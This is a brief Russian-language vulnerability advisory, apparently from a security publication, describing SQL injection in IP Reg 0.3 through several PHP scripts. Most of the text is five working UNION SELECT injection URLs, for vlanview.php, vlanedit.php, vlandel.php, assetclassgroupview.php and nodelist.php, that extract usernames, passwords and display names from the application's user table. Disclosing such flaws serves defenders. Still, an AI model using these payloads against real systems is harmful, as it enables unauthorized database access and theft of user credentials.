Хакер #305. Многошаговые SQL-инъекции
Программа: Ip Reg 0.3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных множественными сценариями, например, vlanview.php, assetclassgroupview.php и nodelist.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[site]/vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58), user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://[site]/vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58), user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://[site]/vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58), user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://[site]/assetclassgroupview.php?assetclassgroup_id='+union+select+1, concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://[site]/nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58), user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*